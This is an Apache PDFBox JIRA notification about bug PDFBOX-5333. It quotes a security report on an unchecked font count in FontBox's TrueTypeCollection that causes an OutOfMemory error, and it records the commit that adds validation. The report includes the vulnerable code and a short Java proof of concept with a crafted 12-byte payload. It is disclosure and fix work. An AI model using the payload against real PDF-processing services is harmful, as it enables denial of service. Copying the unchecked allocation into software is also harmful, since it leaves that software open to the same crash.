[ https://issues.apache.org/jira/browse/PDFBOX-5333?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17449610#comment-17449610 ]
ASF subversion and git services commented on PDFBOX-5333:
---------------------------------------------------------
Commit 1895357 from [email protected] in branch 'pdfbox/trunk'
[ https://svn.apache.org/r1895357 ]
PDFBOX-5333: check number of fonts for invalid values
> Wrong number of fonts leads to OOM-Exception
> --------------------------------------------
>
> Key: PDFBOX-5333
> URL: https://issues.apache.org/jira/browse/PDFBOX-5333
> Project: PDFBox
> Issue Type: Bug
> Components: FontBox
> Affects Versions: 2.0.24, 3.0.0 PDFBox
> Reporter: Andreas Lehmkühler
> Assignee: Andreas Lehmkühler
> Priority: Major
> Fix For: 2.0.25, 3.0.0 PDFBox
>
>
> We got the following error report from Pinohans@JDArmy through security@
> +Description:+
> In FontBox of Apache PDFBox, a carefully crafted PDF
> file can trigger an OutOfMemory-Exception while loading the file. This
> issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.
> Product: Apache PDFBox
> Version: 1.8-3.0.0-alpha2
> Affected component:
> src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java
> +Vulnerability:+
> {code}
> TrueTypeCollection(TTFDataStream stream) throws IOException
> {
>     this.stream = stream;
>
>     // TTC header
>     String tag = stream.readTag();
>     if (!tag.equals("ttcf"))
>     {
>         throw new IOException("Missing TTC header");
>     }
>     float version = stream.read32Fixed();
>     numFonts = (int)stream.readUnsignedInt(); // Vulnerability
>     fontOffsets = new long[numFonts]; // Vulnerability
>     for (int i = 0; i < numFonts; i++)
>     {
>         fontOffsets[i] = stream.readUnsignedInt();
>     }
> {code}
> +Attack vector:+
> {code}
> import org.apache.fontbox.ttf.TrueTypeCollection;
> import java.io.*;
> public class main {
>     public static void main(String[] args) throws IOException {
>         byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00,
>                 0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
>         TrueTypeCollection ttc = new TrueTypeCollection(new ByteArrayInputStream(payload));
>     }
> }
> {code}